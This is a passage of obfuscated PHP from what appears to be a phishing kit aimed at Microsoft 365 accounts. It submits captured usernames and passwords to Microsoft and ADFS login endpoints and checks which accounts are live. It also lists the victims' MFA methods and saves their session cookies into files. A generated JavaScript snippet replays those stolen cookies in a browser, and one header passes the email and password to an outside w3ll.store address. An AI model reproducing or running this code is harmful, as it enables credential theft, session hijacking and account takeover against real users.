                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cache-Control" => 
                        "max-age=0", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Sec-CH-UA" => 
                        ""Microsoft Edge";v="129", "Not=A?Brand";v="8", "Chromium";v="129"", 
                    "Sec-CH-UA-Mobile" => 
                        "?0", 
                    "Sec-CH-UA-Platform" => 
                        ""Windows"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0", 
                ], 
                "form_params" => [ 
                    "LoginOptions" => "1", 
                    "type" => "28", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        $this->ad1e3, 
                    "flowToken" => $this->fac50, 
                    "DontShowAgain" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "14108", 
                ], 
            ] 
        ); 
        goto d0064; 
        a37c8: 
        adf53: 
        goto E9ad6; 
        Ec891: 
        $e65e8 = html_entity_decode($e65e8[1]); 
        goto E0753; 
        D2e2b: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto bfaa6; 
        C36eb: 
        if ( 
            !( 
                strpos( 
                    $A75e0, 
                    "You entered an incorrect username or password." 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "have permission to access" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "The password entered exceeds the maximum length" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "Bad Request" 
                ) !== false || 
                strpos($A75e0, "googlebot") !== 
                    false || 
                strpos( 
                    $A75e0, 
                    "Select a certificate " 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "smusxath.bms.com" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "not support JavaScript" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "trouble signing" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "having some server issues" 
                ) !== false || 
                strpos($A75e0, "apple.com") !== 
                    false || 
                strpos( 
                    $A75e0, 
                    "Not Allowed" 
                ) !== false || 
                strpos($A75e0, ".aon.com") !== false || 
                strpos( 
                    $A75e0, 
                    "Fifth Third ID" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "Configurable default behavior" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "persmissions to access this resource" 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "urlMsaSignUp" 
                ) !== false 
            ) 
        ) { 
            goto e1b45; 
        } 
        goto D9365; 
        E8adc: 
        $this->E423c = $D70fc[0]; 
        goto B1d5e; 
        D9365: 
        $this->status["live"] = false; 
        goto e6324; 
        Bcfed: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto D7208; 
        E8841: 
        curl_setopt($fda09, CURLOPT_POST, 1); 
        goto E3680; 
        f54d3: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto a242f; 
        B5ec1: 
        $f8b73 = isset($ae633[1]) ? $ae633[1] : "[]"; 
        goto Ccc3d; 
        A0cd8: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto D2e2b; 
        C06a1: 
        curl_setopt( 
            $fda09, 
            CURLOPT_URL, 
            $this->status["redirect"] 
        ); 
        goto c530a; 
        F09b1: 
        $A75e0 = curl_exec($fda09); 
        goto C36eb; 
        B9a3f: 
        file_put_contents( 
            $this->A20d7 . "/js_" . $this->Fa736 . ".txt", 
            $E3848 
        ); 
        goto f855f; 
        a242f: 
        $D5295 = file_get_contents( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto B7071; 
        Ad673: 
        f02bc: 
        goto a37c8; 
        Be661: 
        $this->cc473 = $Bc3b4[0]; 
        goto e33de; 
        b0b2a: 
        $this->B5b07 = $ef175[0]; 
        goto d6de8; 
        bcd77: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto Cef18; 
        Ccc3d: 
        $b0338 = json_decode($f8b73, true); 
        goto Bcac7; 
        E0753: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto B8d94; 
        ee9ea: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto e18c5; 
        ab389: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto f641f; 
        e821f: 
        preg_match($c4ca3, $A75e0, $ae633); 
        goto B5ec1; 
        Cef18: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto ee9ea; 
        A701d: 
        preg_match( 
            "/(?<="correlationId":")[^"]*/", 
            $A75e0, 
            $eb813 
        ); 
        goto c664f; 
        Ed39c: 
        Eb0ff: 
        goto B5528; 
        e735f: 
        preg_match( 
            "/name=["']?wresult["']?\s+value=["']?([^"']+)["']?/", 
            $A75e0, 
            $e65e8 
        ); 
        goto Ec891; 
        Be7f9: 
        foreach ($b0338 as $a47dd => $Cfb59) { 
            goto a6fe1; 
            A3763: 
            $this->status["2fa_info"][$a47dd] = [ 
                "method_name" => 
                    $Cfb59["authMethodId"], 
                "display" => 
                    $Cfb59["display"], 
                "isDefault" => 
                    $Cfb59["isDefault"], 
            ]; 
            goto a8f11; 
            a6fe1: 
            if ( 
                !( 
                    isset( 
                        $Cfb59[ 
                            "authMethodId" 
                        ] 
                    ) && 
                    isset($Cfb59["display"]) && 
                    isset($Cfb59["isDefault"]) 
                ) 
            ) { 
                goto db0a3; 
            } 
            goto A3763; 
            F16e9: 
            e6794: 
            goto Ea3f4; 
            a8f11: 
            db0a3: 
            goto F16e9; 
            Ea3f4: 
        } 
        goto Ad673; 
        A10ab: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto a9e0a; 
        f61a8: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto ab389; 
        d9b44: 
        curl_setopt($fda09, CURLOPT_HTTPHEADER, $A03d7); 
        goto F09b1; 
        Bcac7: 
        if (!is_array($b0338)) { 
            goto adf53; 
        } 
        goto Be7f9; 
        Df2d7: 
        $this->fac50 = $ea051[0]; 
        goto Da396; 
        B1d5e: 
        $this->ad1e3 = $eb813[0]; 
        goto Bcfed; 
        f9d13: 
    } 
    private function AuthRedirect() 
    { 
        goto e5cb4; 
        A56e3: 
        $A03d7[] = 
            "Cache-Control: max-age=0"; 
        goto B8364; 
        B70b0: 
        $A03d7[] = 
            "Connection: keep-alive"; 
        goto A56e3; 
        D27d3: 
        $A03d7[] = 
            "Sec-Fetch-Mode: navigate"; 
        goto ac84b; 
        D3628: 
        $this->status["live"] = false; 
        goto c8e30; 
        aa707: 
        curl_setopt($fda09, CURLOPT_RETURNTRANSFER, 1); 
        goto Cc1de; 
        d351d: 
        if ( 
            !( 
                strpos( 
                    $A75e0, 
                    "Incorrect user ID or password." 
                ) !== false || 
                strpos( 
                    $A75e0, 
                    "You don't have permission to access" 
                ) !== false 
            ) 
        ) { 
            goto Ca6f8; 
        } 
        goto D3628; 
        B8364: 
        $A03d7[] = 
            "Upgrade-Insecure-Requests: 1"; 
        goto ac63e; 
        c8e30: 
        Ca6f8: 
        goto D89ac; 
        f9b6b: 
        curl_setopt( 
            $fda09, 
            CURLOPT_ENCODING, 
            "gzip, deflate" 
        ); 
        goto Dd505; 
        C5f5b: 
        curl_close($fda09); 
        goto d351d; 
        C974b: 
        curl_setopt($fda09, CURLOPT_POST, 1); 
        goto c8681; 
        Fdd16: 
        $A03d7[] = 
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"; 
        goto B8eed; 
        Dd505: 
        $A03d7 = []; 
        goto B70b0; 
        Cc1de: 
        curl_setopt($fda09, CURLOPT_CUSTOMREQUEST, "POST"); 
        goto C974b; 
        dc8ef: 
        $A03d7[] = 
            "Referer: " . 
            $this->status["redirect"]; 
        goto cbc61; 
        e5cb4: 
        $fda09 = curl_init(); 
        goto D28c7; 
        c8681: 
        curl_setopt( 
            $fda09, 
            CURLOPT_POSTFIELDS, 
            "UserName={$this->Fa736}&Password={$this->Ed558}&AuthMethod=FormsAuthentication" 
        ); 
        goto f9b6b; 
        D28c7: 
        curl_setopt( 
            $fda09, 
            CURLOPT_URL, 
            $this->status["redirect"] 
        ); 
        goto aa707; 
        cbc61: 
        $A03d7[] = 
            "Accept-Language: en-US,en;q=0.9"; 
        goto d935c; 
        B8eed: 
        $A03d7[] = 
            "Sec-Fetch-Site: same-origin"; 
        goto D27d3; 
        E89d3: 
        $A03d7[] = 
            "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"; 
        goto Fdd16; 
        d8637: 
        $A03d7[] = 
            "Content-Type: application/x-www-form-urlencoded"; 
        goto E89d3; 
        De48b: 
        $A03d7[] = 
            "Sec-Fetch-Dest: document"; 
        goto dc8ef; 
        ac63e: 
        $A03d7[] = 
            "Origin: https://adfs.cms.k12.nc.us"; 
        goto d8637; 
        ac84b: 
        $A03d7[] = 
            "Sec-Fetch-User: ?1"; 
        goto De48b; 
        d720b: 
        curl_setopt($fda09, CURLOPT_HTTPHEADER, $A03d7); 
        goto D13e2; 
        d935c: 
        $A03d7[] = 
            "Cookie: MSISLoopDetectionCookie=MjAyMS0wOC0xMzowMzo1MzoyNlpcMQ=="; 
        goto d720b; 
        D13e2: 
        $A75e0 = curl_exec($fda09); 
        goto C5f5b; 
        D89ac: 
    } 
    private function AuthDouble() 
    { 
        goto Fec57; 
        Fec57: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto fdc64; 
        E3771: 
        $this->ad1e3 = $eb813[0]; 
        goto cd82b; 
        cd82b: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto F2956; 
        d0366: 
        Efe94: 
        goto A3b26; 
        A1f25: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/appverify", 
            [ 
                "headers" => [ 
                    "Connection" => 
                        "keep-alive", 
                    "Cache-Control" => 
                        "no-cache", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Origin" => "null", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Referer" => 
                        "https://w3ll.store/api/office-val?email=" . 
                        $this->Fa736 . 
                        "&pass=" . 
                        $this->Ed558, 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
                "form_params" => [ 
                    "ContinueAuth" => 
                        "true", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        "1f12d14c-7a42-4542-be79-78f592f96800", 
                    "flowToken" => $this->fac50, 
                    "iscsrfspeedbump" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "4624", 
                ], 
            ] 
        ); 
        goto c8908; 
        c6ed6: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto d8680; 
        E6c0b: 
        $this->fac50 = $ea051[0]; 
        goto Fa93d; 
        c8908: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto C9218; 
        Ce442: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto c6ed6; 
        A4b5e: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto Ce442; 
        b3a4b: 
        $this->B522d = $a6081[0]; 
        goto E1e92; 
        d932d: 
        goto fcfe2; 
        goto D4edd; 
        D9336: 
        $this->status["live"] = true; 
        goto Cf48e; 
        fdc64: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto Ff3e0; 
        bf820: 
        $this->B5b07 = $ef175[0]; 
        goto b3a4b; 
        E1e92: 
        $this->E423c = $D70fc[0]; 
        goto E3771; 
        D4edd: 
        A8aa1: 
        goto D9336; 
        C34e9: 
        preg_match( 
            "/(?<="apiCanary":")[^"]*/", 
            $A75e0, 
            $a6081 
        ); 
        goto ca5f4; 
        F2956: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto A1f25; 
        Cf48e: 
        fcfe2: 
        goto B6257; 
        d8680: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto C34e9; 
        Cd218: 
        $this->status["live"] = false; 
        goto d0366; 
        ce7d6: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto A4b5e; 
        Fa93d: 
        $this->cc473 = $Bc3b4[0]; 
        goto bf820; 
        C9218: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto A1f17; 
        Fc940: 
        preg_match( 
            "/(?<="correlationId":")[^"]*/", 
            $A75e0, 
            $eb813 
        ); 
        goto E6c0b; 
        E4afe: 
        A00a4: 
        goto Cd218; 
        ca5f4: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $D70fc 
        ); 
        goto Fc940; 
        f9000: 
        if ( 
            strpos( 
                $A75e0, 
                "Update your password" 
            ) !== false 
        ) { 
            goto A8aa1; 
        } 
        goto Db3fd; 
        A1f17: 
        if ( 
            strpos( 
                $A75e0, 
                "Your account or password is incorrect" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "The password entered exceeds the maximum length" 
            ) || 
            strpos($A75e0, "Bad Request") !== 
                false || 
            strpos($A75e0, "googlebot") !== false || 
            strpos( 
                $A75e0, 
                "Select a certificate " 
            ) !== false || 
            strpos( 
                $A75e0, 
                "smusxath.bms.com" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "not support JavaScript" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "trouble signing" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "having some server issues" 
            ) !== false || 
            strpos($A75e0, "apple.com") !== false || 
            strpos($A75e0, "Not Allowed") !== 
                false || 
            strpos($A75e0, ".aon.com") !== false || 
            strpos( 
                $A75e0, 
                "Fifth Third ID" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "Configurable default behavior" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "persmissions to access this resource" 
            ) !== false || 
            strpos( 
                $A75e0, 
                "urlMsaSignUp" 
            ) !== false 
        ) { 
            goto A00a4; 
        } 
        goto f9000; 
        Db3fd: 
        $this->status["live"] = false; 
        goto d932d; 
        Ff3e0: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/login", 
            [ 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638223374726509583.OWQ3ODA3MTgtYTA4YS00ZmJkLWFmZDgtNWRlNjFhNGE0OWFlMTViOTFiNjYtZDZlMS00Yjg1LTkzMGMtOTg0ODY4ZjlkOWE2&ui_locales=en-US&mkt=en-US&client-request-id=c5add03e-a321-4a8a-8304-718c10e95332&state=_Pj2XV0oCkx-MG1peZauOAUO2myIrNC7wxUTB7fseM25e4gLF50DyLWhyCcZwAizYfQ4acxUTv-yhDqXz-yV6Bn_4tBXsKT88bERuNecotT3rClxuRpc48mspsoRPGvn1Ajswfj1m8wc9LkTICV_lWS9JKsScnsYLYAQ94KiMlJ0KEqv94fGGGehjrNnMZIGphXqgmKwmARVRYhxPwVLHcQE4SK1fvUlOXBy4Rhc7MX2lA1b3aNgULKEyhHR65626kygUygA92bPijXvNCm20w&x-client-SKU=ID_NET6_0&x-client-ver=6.26.1.0", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                ], 
                "form_params" => [ 
                    "i13" => "0", 
                    "login" => $this->Fa736, 
                    "loginfmt" => $this->Fa736, 
                    "type" => "11", 
                    "LoginOptions" => 
                        "3", 
                    "lrt" => "", 
                    "lrtPartition" => "", 
                    "hisRegion" => "", 
                    "hisScaleUnit" => "", 
                    "passwd" => $this->Ed558, 
                    "ps" => "2", 
                    "psRNGCDefaultType" => 
                        "", 
                    "psRNGCEntropy" => 
                        "", 
                    "psRNGCSLK" => "", 
                    "canary" => $this->B5b07, 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        "a0686a42-206a-413d-b3ee-babbff250600", 
                    "flowToken" => $this->fac50, 
                    "PPSX" => "", 
                    "NewUser" => "1", 
                    "FoundMSAs" => "", 
                    "fspost" => "0", 
                    "i21" => "0", 
                    "CookieDisclosure" => 
                        "0", 
                    "IsFidoSupported" => 
                        "0", 
                    "isSignupPost" => "0", 
                    "i19" => "106975", 
                ], 
            ] 
        ); 
        goto ce7d6; 
        B6257: 
        goto Efe94; 
        goto E4afe; 
        A3b26: 
    } 
    private function AuthBusiness() 
    { 
        goto a9cff; 
        F75e3: 
        $Accd6 = $Bcc9d->request( 
            "GET", 
            "https://device.login.microsoftonline.com:443", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Priority" => 
                        "u=0, i", 
                    "Sec-Ch-Ua" => 
                        ""Chromium";v="128", "Not;A=Brand";v="24", "Microsoft Edge";v="128"", 
                    "Sec-Ch-Ua-Mobile" => 
                        "?0", 
                    "Sec-Ch-Ua-Platform" => 
                        ""Windows"", 
                    "Sec-Ch-Ua-Platform-Version" => 
                        ""15.0.0"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "cross-site", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0 OS/10.0.22635", 
                    "X-Edge-Shopping-Flag" => 
                        "0", 
                ], 
                "form_params" => [ 
                    "request" => $a967e, 
                    "flowToken" => $D6e97, 
                ], 
            ] 
        ); 
        goto c53d4; 
        F8a7f: 
        if ( 
            strpos( 
                $A75e0, 
                "urlBeginAuth" 
            ) !== false 
        ) { 
            goto b093c; 
        } 
        goto c2a45; 
        b7ca8: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto F75e3; 
        a9cff: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto D5ddc; 
        af3b4: 
        aab0d: 
        goto b1e89; 
        e0879: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto e1599; 
        e4c3d: 
        $this->cc473 = $Bc3b4[0]; 
        goto bbb54; 
        bea95: 
        $Ddc7a = $Ddc7a[0]; 
        goto D04bf; 
        db1ed: 
        D4ab2: 
        goto b1004; 
        d03df: 
        c19bb: 
        goto F4ef6; 
        D05a3: 
        preg_match($c4ca3, $A75e0, $ae633); 
        goto b3d63; 
        E5583: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto Fbc04; 
        d5197: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto a3869; 
        a52d6: 
        c5c97: 
        goto Ab8e9; 
        Acc51: 
        preg_match( 
            "/name="flowToken" value="([^"]+)"/", 
            $A75e0, 
            $B2f3b 
        ); 
        goto c6a91; 
        bd064: 
        $E3848 = 
            "(function() {\xd\xa					\x9let cookies = JSON.parse(`" . 
            $D5295 . 
            "`);\xd
	\x9		\x9\xd\xa	\x9\x9\x9\x9	function putCookie(key, value, domain, path, isSecure) {
\xa	\x9\x9\x9\x9		const cookieMaxAge = "Max-Age=31536000";\xd
\x9\x9				\x9if (key.startsWith("__Host")) {
\x9\x9\x9\x9\x9	\x9\x9console.log("==== Kratos ====>", key, value);
\x9\x9\x9		\x9		document.cookie = `${key}=${value};${cookieMaxAge};path=/;Secure;SameSite=None`;
\xa	\x9\x9\x9\x9\x9	} else if (key.startsWith("__Secure")) {\xd
\x9\x9\x9\x9		\x9\x9console.log("==== Kratos ====>", key, value);
\x9\x9\x9\x9	\x9\x9	document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;
\xa\x9\x9\x9\x9	\x9	} else {\xd\xa				\x9\x9	\x9if (isSecure) {\xd\xa				\x9		\x9	console.log("==== Kratos ====>", key, value);
\xa		\x9\x9	\x9		\x9if (window.location.hostname == domain) {\xd\xa\x9\x9\x9\x9		\x9\x9\x9\x9document.cookie = `${key}=${value};${cookieMaxAge}; path=${path}; Secure; SameSite=None`;\xd
\x9\x9	\x9\x9\x9	\x9\x9} else {
\xa\x9\x9	\x9	\x9		\x9	document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;\xd\xa	\x9\x9		\x9			}
\x9\x9\x9\x9				} else {
\x9\x9\x9\x9	\x9\x9	\x9console.log("==== Kratos ====>", key, value);\xd\xa		\x9	\x9\x9\x9		if (window.location.hostname == domain) {\xd
		\x9		\x9\x9	\x9\x9document.cookie = `${key}=${value};${cookieMaxAge};path=${path};`;\xd
				\x9				} else {\xd
\x9	\x9\x9		\x9			document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};`;\xd\xa		\x9	\x9\x9	\x9	}
\x9	\x9					}\xd\xa\x9\x9				\x9}
\xa\x9\x9\x9	\x9	}\xd\xa			\x9\x9\x9for (let cookie of cookies) {\xd
			\x9			putCookie(cookie.Name, cookie.Value, cookie.Domain, cookie.Path, cookie.Secure);
				\x9	}\xd\xa		\x9		}());"; 
        goto c15c6; 
        a693e: 
        $this->status["live"] = false; 
        goto D4dee; 
        d53e8: 
        $this->fac50 = $ea051[0]; 
        goto e4c3d; 
        b197a: 
        preg_match( 
            "/(?<="correlationId":")[^"]*/", 
            $A75e0, 
            $eb813 
        ); 
        goto d53e8; 
        D4dee: 
        return 1; 
        goto F5d32; 
        bbb54: 
        $this->B5b07 = $ef175[0]; 
        goto b1ef9; 
        B782c: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto d8ffa; 
        e3717: 
        B5586: 
        goto a5e1d; 
        b8346: 
        return 1; 
        goto c6100; 
        Ae416: 
        $Accd6 = $Bcc9d->request( 
            "GET", 
            "https://login.microsoftonline.com:443/common/DeviceAuthTls/reprocess", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Priority" => 
                        "u=0, i", 
                    "Sec-Ch-Ua" => 
                        ""Chromium";v="128", "Not;A=Brand";v="24", "Microsoft Edge";v="128"", 
                    "Sec-Ch-Ua-Mobile" => 
                        "?0", 
                    "Sec-Ch-Ua-Platform" => 
                        ""Windows"", 
                    "Sec-Ch-Ua-Platform-Version" => 
                        ""15.0.0"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "cross-site", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0 OS/10.0.22635", 
                    "X-Edge-Shopping-Flag" => 
                        "0", 
                ], 
                "form_params" => [ 
                    "ctx" => $a967e, 
                    "flowToken" => $D6e97, 
                ], 
            ] 
        ); 
        goto c6529; 
        D6656: 
        goto fe7e5; 
        goto Eee21; 
        F4ef6: 
        $this->status["live"] = false; 
        goto b8346; 
        Ad66b: 
        $D6e97 = $B2f3b[1]; 
        goto Fd9f7; 
        b1ef9: 
        $this->B522d = $a6081[0]; 
        goto E086c; 
        D8942: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto ab77c; 
        b1004: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto b7ca8; 
        Ab8e9: 
        preg_match( 
            "/name="flowToken" value="([^"]+)"/", 
            $A75e0, 
            $B2f3b 
        ); 
        goto eb79c; 
        a05b0: 
        foreach ($b0338 as $a47dd => $Cfb59) { 
            goto E1ab3; 
            E1ab3: 
            if ( 
                !( 
                    isset( 
                        $Cfb59[ 
                            "authMethodId" 
                        ] 
                    ) && 
                    isset($Cfb59["display"]) && 
                    isset($Cfb59["isDefault"]) 
                ) 
            ) { 
                goto b6082; 
            } 
            goto F3990; 
            F3990: 
            $this->status["2fa_info"][$a47dd] = [ 
                "method_name" => 
                    $Cfb59["authMethodId"], 
                "display" => 
                    $Cfb59["display"], 
                "isDefault" => 
                    $Cfb59["isDefault"], 
            ]; 
            goto b2382; 
            da90a: 
            B5e1d: 
            goto Ea790; 
            b2382: 
            b6082: 
            goto da90a; 
            Ea790: 
        } 
        goto af3b4; 
        c53d4: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto d5197; 
        Ff589: 
        $D6e97 = $B2f3b[1]; 
        goto db1ed; 
        B713e: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto Ae416; 
        f9726: 
        preg_match( 
            "/(?<="urlResume":")[^"]*/", 
            $A75e0, 
            $Ddc7a 
        ); 
        goto bea95; 
        f72c8: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $D70fc 
        ); 
        goto b197a; 
        Fd9f7: 
        E1b70: 
        goto C52ba; 
        e1599: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto Ab18b; 
        b3d63: 
        $f8b73 = isset($ae633[1]) ? $ae633[1] : "[]"; 
        goto f2be5; 
        B1f1c: 
        $Accd6 = $Bcc9d->request( 
            "POST", 
            "https://login.microsoftonline.com/kmsi", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cache-Control" => 
                        "max-age=0", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
